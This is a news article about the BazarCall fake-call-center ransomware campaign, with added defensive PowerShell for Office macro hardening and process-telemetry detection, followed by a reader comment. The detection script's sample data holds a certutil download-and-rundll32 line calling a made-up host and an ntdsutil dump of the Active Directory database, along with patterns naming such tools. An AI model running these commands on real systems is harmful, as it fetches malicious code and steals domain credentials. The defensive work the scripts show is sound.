Windows Users Tricked into Ransomware Attack at Call Centers


This is something we say repeatedly here on Make Tech Easier as we report the news: every time scammers and bad actors develop a new attack, the tech industry finds a way to fight back and close off that avenue. That sends the attackers back to the drawing board to create a new attack, and the cycle continues. The newest delivery vector for ransomware is the fake call center. Will this force Microsoft to up its game to fight back?

Call Centers Ransomware Attack

While the battle has escalated to the point where attackers are emboldened enough to set up fake call centers, the ball is in Microsoft’s court to stop them. Microsoft has a team of cybersecurity researchers on the case, tracking the BazarCall group that operates the fraudulent call centers and uses them to deliver ransomware.

Users who call the numbers end up with their PCs infected by BazarLoader, a malware loader whose job is to fetch and run further malware, in this campaign ending in ransomware.

The BazarCall (aka BazaCall) group has been at this since the beginning of the year. Its call center operators talk callers through installing BazarLoader on their own PCs.


Brad Duncan, with the Palo Alto Networks cybersecurity company, described the attack by saying, “After a client is infected, criminals use this backdoor access to send follow-up malware, scan the environment, and exploit other vulnerable hosts on the network.”

The attack starts with a Windows user receiving a phishing email claiming that a subscription trial has expired and that a fee will be charged unless they call a phone number to cancel. The email carries no link or attachment, only that phone number, which is why it slips past mail filters that look for malicious URLs and attachments.

The Microsoft Security Intelligence team is focusing on emails that target Office 365 users. In a sample email, the attackers pose as a tech company and tell the user they will be charged when a demo expires in 24 hours.

“When recipients call the number, a fraudulent call center operated by the attackers instructs them to visit a website and download an Excel file to cancel the service. The Excel file contains a malicious macro that downloads the payload,” described the security team.
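The weak point in that chain, from a defender’s view, is the macro: if Excel cannot run macros from internet-sourced files and cannot spawn child processes, the “download an Excel file to cancel” step fails even when the user follows the operator’s instructions. The script below is an added example written for this article, not instructions from Microsoft or Make Tech Easier. It assumes a Windows 10/11 machine with Microsoft Defender Antivirus active, an Office 2016/2019/Microsoft 365 install (policy key version “16.0”), and an elevated PowerShell session. The ASR rule GUIDs are Microsoft’s documented identifiers for those rules.

```powershell
# Added example (not from the article): harden a Windows workstation against the
# "download an Excel file to cancel" step of BazaCall.
# Assumptions: Office policy key version 16.0 (Office 2016/2019/365), Microsoft Defender
# Antivirus active, session running as administrator.

# 1. Office macro policy for the current user.
#    blockcontentexecutionfrominternet = 1 refuses to run macros in files carrying the
#    Mark-of-the-Web (anything downloaded from a website, as in this campaign).
#    VBAWarnings: 1 = enable all, 2 = disable with notification,
#                 3 = disable except digitally signed, 4 = disable without notification.
$apps = 'Excel', 'Word', 'PowerPoint'
foreach ($app in $apps) {
    $key = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
    New-Item -Path $key -Force | Out-Null
    New-ItemProperty -Path $key -Name 'blockcontentexecutionfrominternet' -PropertyType DWord -Value 1 -Force | Out-Null
    New-ItemProperty -Path $key -Name 'VBAWarnings' -PropertyType DWord -Value 3 -Force | Out-Null
    Write-Host "Macro policy applied for $app"
}

# 2. Defender Attack Surface Reduction rules. Even if a macro does run, these stop Excel
#    from launching cmd/PowerShell, dropping executables, or injecting into other processes.
$asrRules = @{
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block all Office applications from creating child processes'
    '3B576869-A4EC-4529-8536-B80A7769E899' = 'Block Office applications from creating executable content'
    '75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84' = 'Block Office applications from injecting code into other processes'
    'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550' = 'Block executable content from email client and webmail'
}
foreach ($id in $asrRules.Keys) {
    # Use AuditMode first in an environment with many macro-heavy workbooks, then switch to Enabled.
    Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions Enabled
    Write-Host "Enabled ASR rule $id : $($asrRules[$id])"
}

# 3. Controlled folder access, the "Ransomware protection" toggle in Windows Security,
#    so an unapproved process cannot rewrite files in the protected user folders.
Set-MpPreference -EnableControlledFolderAccess Enabled

# 4. Show the resulting Defender state for verification.
Get-MpPreference | Select-Object AttackSurfaceReductionRules_Ids, AttackSurfaceReductionRules_Actions, EnableControlledFolderAccess
```

The registry values are written under the per-user Policies hive, so they take effect on the next Office launch and show up as "managed by your organization" in the Trust Center; in a domain, the same values are normally pushed with the Office ADMX templates via Group Policy rather than by script.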


Microsoft’s team also said that once BazarLoader is in place, the operators move to hands-on-keyboard activity using Cobalt Strike, a commercial penetration-testing toolkit that attackers widely abuse as a post-compromise command-and-control framework, to steal credentials. Among the data taken is the Active Directory database, which holds every domain account’s identity and password hashes and therefore lets the attackers move across the entire network before deploying ransomware.
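Two of those stages leave clear traces in process-creation telemetry: an Excel macro that “downloads the payload” has to start a shell, script host or download utility from inside EXCEL.EXE, and copying the Active Directory database off a domain controller requires a handful of well-known commands. The script below is an added example written for this article, not code from Microsoft, Palo Alto Networks or the attackers. The event records are constructed to resemble Sysmon Event ID 1 fields (Computer, ParentImage, Image, CommandLine); every host name, path and URL in them is made up. The ntdsutil/vssadmin patterns in rule 2 are general NTDS.dit-theft techniques (MITRE ATT&CK T1003.003), not a claim about how this particular group copied the database.

```powershell
# Added example (not from the article): flag the post-macro stages of BazaCall in
# process-creation telemetry. Sample records below are constructed, not real logs.

$officeParents      = 'EXCEL.EXE', 'WINWORD.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE'
$suspiciousChildren = 'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe',
                      'mshta.exe', 'rundll32.exe', 'regsvr32.exe', 'certutil.exe', 'curl.exe', 'bitsadmin.exe'

function Find-BazaCallActivity {
    param([Parameter(Mandatory)][object[]]$Events)

    foreach ($e in $Events) {
        $parent = Split-Path -Leaf $e.ParentImage
        $child  = Split-Path -Leaf $e.Image
        $cmd    = [string]$e.CommandLine

        # Rule 1: an Office application launching a shell, script host or download utility.
        # Ordinary spreadsheets almost never do this; a macro that fetches a payload must.
        # (-contains is case-insensitive in PowerShell, so EXCEL.EXE and excel.exe both match.)
        if ($officeParents -contains $parent -and $suspiciousChildren -contains $child) {
            [pscustomobject]@{
                Computer    = $e.Computer
                Rule        = 'Office app spawned script host/downloader'
                Parent      = $parent
                Child       = $child
                CommandLine = $cmd
            }
        }

        # Rule 2: commands that copy the Active Directory database (NTDS.dit) off a DC.
        # General technique (ATT&CK T1003.003), assumed here, not attributed to this campaign.
        if ($cmd -match '(?i)ntdsutil.*\bifm\b' -or
            $cmd -match '(?i)vssadmin\s+create\s+shadow' -or
            $cmd -match '(?i)ntds\.dit') {
            [pscustomobject]@{
                Computer    = $e.Computer
                Rule        = 'Possible AD database (NTDS.dit) extraction'
                Parent      = $parent
                Child       = $child
                CommandLine = $cmd
            }
        }
    }
}

# Constructed sample telemetry: a benign Excel print helper, a macro-driven download,
# and an NTDS dump on a domain controller. Hosts, paths and the URL are invented.
$sample = @(
    [pscustomobject]@{
        Computer    = 'WS-017'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
        Image       = 'C:\Windows\splwow64.exe'
        CommandLine = 'C:\Windows\splwow64.exe 12288'
    }
    [pscustomobject]@{
        Computer    = 'WS-017'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
        Image       = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'cmd /c certutil -urlcache -split -f http://cancel-subscription.invalid/loader.dll %TEMP%\ld.dll && rundll32 %TEMP%\ld.dll,Start'
    }
    [pscustomobject]@{
        Computer    = 'DC01'
        ParentImage = 'C:\Windows\System32\cmd.exe'
        Image       = 'C:\Windows\System32\ntdsutil.exe'
        CommandLine = 'ntdsutil "ac i ntds" "ifm" "create full C:\Temp\ad" q q'
    }
)

# Expected: two findings (the cmd.exe spawn on WS-017 and the ntdsutil run on DC01);
# the splwow64.exe record is not flagged.
Find-BazaCallActivity -Events $sample | Format-Table -AutoSize
```

In production the `$sample` array would be replaced by `Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -FilterXPath "*[System[EventID=1]]"` with the XML fields mapped onto the same property names; rule 1 is noisy on hosts where add-ins legitimately launch PowerShell, so tune the child list per fleet before alerting on it.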

After the Attack

Again, this is just one more round in the cycle, and it is a bit alarming to consider where it leads next. BazarCall used a familiar attack but carried it out in a way that kept users from suspecting anything. Few users would expect that a call center they were directed to by email would kick off a ransomware attack.

But now that Microsoft’s security team is onto BazarCall and has figured out the attack, the cybercriminals will be forced to move on to a new destructive plan. And that’s where the alarm comes in: what will the attackers do next? How will they up their game this time?

Read on to learn more about ransomware and how to protect yourself. Also learn how to enable ransomware protection in Windows Defender.

Laura Tucker

Laura has spent nearly 20 years writing news, reviews, and op-eds, with more than 10 of those years as an editor as well. She has exclusively used Apple products for the past three decades. In addition to writing and editing at MTE, she also runs the site's sponsored review program.

One comment

  1. “This informs them that a subscription trial has expired and that they will be charged a fee.”
    Don’t people keep track of their subscriptions??? If it is a subscription that they do not recognize, that should be a big, red flag.

    “download an Excel file to cancel the service”
    Another big, red flag! Why wouldn’t any clear-thinking person question why it is necessary to download an EXCEL file to cancel anything rather than just tell the person on the other side of the phone to do it?!

    “it means the ball’s in Microsoft’s court to stop them”
    Microsoft can start by quitting forcing software “updates” and downloads on the users. How are the users to distinguish between a legitimate update and some sketchy software that will install a Microsoft tracker or, even worse, will install malware? After every Win 10 update, the Internet is full of articles on how to fix the problems that update introduced. Doesn’t MakeTechEasier have a running article on how to fix problems created by the latest MS update?
